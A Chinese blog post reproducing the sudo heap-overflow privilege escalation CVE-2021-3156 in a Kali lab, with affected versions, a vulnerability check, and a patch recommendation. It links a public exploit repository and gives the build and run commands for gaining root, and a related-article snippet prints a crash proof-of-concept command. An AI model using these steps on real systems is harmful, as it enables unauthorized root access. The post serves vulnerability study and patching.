CVE-2021-3156(Linux sudo权限提升漏洞)漏洞复现

最新推荐文章于 2024-04-10 22:23:43 发布
最新推荐文章于 2024-04-10 22:23:43 发布
阅读量1.2k 收藏 5
点赞数 2
分类专栏: 漏洞复现 文章标签: linux ubuntu
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/markecheng/article/details/113541065
版权

一、漏洞简介

1月26日,Sudo发布安全通告,修复了一个类Unix操作系统在命令参数中转义反斜杠时存在基于堆的缓冲区溢出漏洞。当sudo通过-s或-i命令行选项在shell模式下运行命令时,它将在命令参数中使用反斜杠转义特殊字符。但使用-s或 -i标志运行sudoedit时,实际上并未进行转义,从而可能导致缓冲区溢出。只要存在sudoers文件(通常是 /etc/sudoers),攻击者就可以使用本地普通用户利用sudo获得系统root权限。请受影响的用户尽快采取措施进行防护。

二、影响版本

Sudo 1.8.2 - 1.8.31p2

Sudo 1.9.0 - 1.9.5p1

不受影响版本

Sudo =>1.9.5p2

三、漏洞复现

环境:kali虚拟机
在这里插入图片描述
普通用户,以及sudoedit版本为1.8.31p1
漏洞利用下载地址:
https://github.com/blasty/CVE-2021-3156
第一步使用
sudoedit ‐s / 命令来查看是否用风险
sudoedit ‐s /
返回以“ sudoedit:”开头的错误,则可能存在安全风险。
返回以“ usage:”开头的错误响应,则无影响

然后下载漏洞利用的地址
https://github.91chifun.workers.dev//https://github.com/blasty/CVE-2021-3156.git
后进入 ./CVE-2021-3156文件夹内
make
在这里插入图片描述

./sudo-hax-me-a-sandwich
在这里插入图片描述
这个出现的(0)(1)(2)显示的是可以进行漏洞利用的版本
然后在根据我们所知道我的sudoedit版本为1.8.31p1,根据以上所示,我们要选择1
所以,输入命令
./sudo-hax-me-a-sandwich 1
即可成功
在这里插入图片描述

四、漏洞防护

目前官方已在sudo新版本1.9.5p2中修复了该漏洞,请受影响的用户尽快升级版本进行防护,或者更新

参考链接

https://www.freebuf.com/vuls/262534.html

phononer
关注
  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Sudo缓冲区溢出漏洞(CVE-2021-3156)
04-06
linux sudo升级为1.9.5p2 及以上版本,sudo-1.9.10-1.el7.x86_64.rpm
CVE-2021-3156 漏洞笔记
weixin_46483787的博客
07-01 9999
CVE-2021-3156笔记
CVE-2021-4034漏洞原理解析
最新发布
QXXXD的博客
04-10 569
漏洞挖掘入门
Linux脏牛漏洞提权
热门推荐
wangyuxiang946的博客
07-22 1万+
操作系统: Linux ( CentOS 6.5) Web服务: PHP+Apache 环境搭建 第一步,配置yum源,安装PHP 进入yum目录 cd /etc/yum.repos.d/ 创建文件夹a mkdir a 将此目录下的所有文件移动至文件夹a中 mv C* a 创建yum源文件 vim my.repo -- 创建yum源文件,内容如下: [sss] name=my baseurl=file:/media/CentOS_6.5_Fina...
怎样在Linux中实行漏洞,Linux eBPF JIT权限提升漏洞CVE-2020-27194)分析与验证...
weixin_35785090的博客
05-16 355
漏洞背景近日,国外安全研究人员披露一个Linux eBPF verifier组件错误验证漏洞,此漏洞源于bpf验证系统在Linux内核中没有正确计算某些操作的寄存器边界跟踪,导致本地攻击者可以利用此缺陷进行内核信息泄露或特权提升,该漏洞编号为CVE-2020-27194。影响范围与防护措施1、影响范围Linux-5.7 ~ Linux-5.8.14Ubuntu 20.102、防护措施及时更新升级内...
分析|CVE-2021-3156-sudo堆溢出高危漏洞
zhangge3663的博客
01-29 578
编辑前言 Qualys的安全研究人员于1月13日发文称,攻击者无需知道用户密码即可成功利用此漏洞,在众多基于 Linux 的发行版本中获得最高的 root 权限。受影响的 Sudo 漏洞版本包括从 1.8.2 到 1.8.32p2 的经典版本,以及从 1.9.0 到 1.9.5p1 所有稳定版本。 调试方式 首先从github下载代码: https://github.com/sudo-project/sudo/archive/SUDO_1_9_5p1.tar.gz 编译 tar xf su
Sudo堆溢出漏洞(CVE-2021-3156)
蚁景网安学院
06-28 1009
2021 年 1 月 26 日,Qualys Research Labs在 sudo了一个缺陷。sudo 解析命令行参数的方式时,错误的判断了截断符,从而导致攻击者可以恶意构造载荷,使得sudo发生堆溢出,该漏洞在配合环境变量等分配堆以及释放堆的原语下,可以致使本地提权。
[漏洞分析] CVE-2021-3156 sudo提权分析及exp调试修改
Breeze的博客
01-24 1万+
本文提供CVE-2021-3156漏洞的docker调试环境;并对该漏洞原理以及利用细节、堆布局方法进行详细分析。
SUDO(CVE-2021-3156)提权&rsync未授权访问提权
m0_62207170的博客
03-06 715
SUDO(CVE-2021-3156)提权&rsync未授权访问提权
CVE-2021-3156 sudo堆溢出分析与利用
qq_41252520的博客
01-29 1621
CVE-2021-3156 0x0 简介 sudoLinux比较常用的命令,它允许普通用户获得临时的root身份执行特权指令,保障了Linux系统的安全。 0x1 漏洞 【环境】:ubuntu18.04 【版本】:sudo-1.8.27 ​ 输入以下POC: sudoedit -s '\' `perl -e 'print "A" x 65536'` 0x2 漏洞分析 (1)环境搭建 首先通过输入命令查看当前系统使用的版本 sudo --version 下载合适的sudo,解压并编译。 (2
centos7-sudo-1.9.9.rpm包。修CVE-2021-3156,Sudo堆缓冲区溢出漏洞
01-30
此为centos7版的最新sudo-1.9.9.rpm包,修CVE-2021-3156漏洞。 升级步骤: 1、将RPM包上传到服务器上, 2、执行升级命令: # rpm -Uvh sudo-1.9.9-1.el7.x86_64.rpm 3、执行完毕后,查询sudo版本: # sudo -V
CVE-2021-3156:有关CVE-2021-3156的注意事项
05-24
CVE-2021-3156 注意:这些说明是我自己的,并摘自我做过的信息流。 如果有任何问题,请通知我。 首先信任官方消息! 大家好, 几天前,在sudo中发了严重的基于堆的缓冲区溢出,任何本地用户都可以利用该缓冲区...
CVE-2021-21972:CVE-2021-21972漏洞利用
03-04
CVE-2021-21972 CVE-2021-21972工作于VMware-VCSA-all-6.7.0-8217866,VMware-VIM-all-6.7.0-8217866 :heavy_check_mark: VMware-VCSA-all-6.5.0-16613358 :heavy_check_mark:对于vCenter6.7 U2 + vCenter 6.7U2 +在...
利用CVE-2021-3156进行远程提权
Zero_wenlong的博客
10-30 3195
利用CVE-2021-3156进行远程提权 一、漏洞简介 2021年1月26日,Linux安全工具sudo被发严重的基于堆缓冲区溢出漏洞。利用这一漏洞,攻击者无需知道用户密码,一样可以获得root权限,并且是在默认配置下。此漏洞已分配为CVE-2021-3156,危险等级评分为7分. 当sudo通过-s或-i命令行选项在shell模式下运行命令时,它将在命令参数中使用反斜杠转义特殊字符。但使用-s或-i标志运行sudoedit时,实际上并未进行转义,从而可能导致缓冲区溢出。因此只要存在sudoers文件(
CVE-2021-3156漏洞
qq_52107280的博客
07-20 1009
CVE-2021-3156 Linux sudo权限提升漏洞 漏洞描述 1月26日,Sudo发布安全通告,修了一个类Unix操作系统在命令参数中转义反斜杠时存在基于堆的缓冲区溢出漏洞。当sudo通过-s或-i命令行选项在shell模式下运行命令时,它将在命令参数中使用反斜杠转义特殊字符。但使用-s或 -i标志运行sudoedit时,实际上并未进行转义,从而可能导致缓冲区溢出。只要存在sudoers文件(通常是 /etc/sudoers),攻击者就可以使用本地普通用户利用sudo获得系统root权
sudo堆缓冲区溢出提权漏洞CVE-2021-3156)
Ryan的博客
01-13 2648
sudo堆缓冲区溢出提权漏洞CVE-2021-3156)
CVE-2021-3156 sudo堆溢出漏洞
qq_49279082的博客
02-21 350
sudo堆溢出漏洞(一个属于内网提权的漏洞)
CVE-2021-3156
weixin_43781139的博客
03-04 677
0x00 前言 几天前爆出了一个高危sudo提权洞,这我立马就来劲了,赶紧过来一波涨涨知识。 0x01 漏洞详情 Sudo是一个功能强大的工具,其允许普通用户执行root权限命令,大多数基于Unix和Linux的操作系统都包含sudo。 2021年01月26日,sudo被披露存在一个基于堆的缓冲区溢出漏洞CVE-2021-3156,该漏洞被命名为“Baron Samedit”),可导致本地权限提升。 当在类Unix的操作系统上执行命令时,非root用户可以使用sudo命令来以ro...
cve-2021-3618漏洞
02-06
CVE-2021-3618漏洞是指影响了Mozilla Firefox浏览器的一个安全漏洞。该漏洞步骤如下: 1. 首先,你需要安装最新版本的Mozilla Firefox浏览器。确保你的浏览器已经更新到最新版本,因为最新版本通常会修已知...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值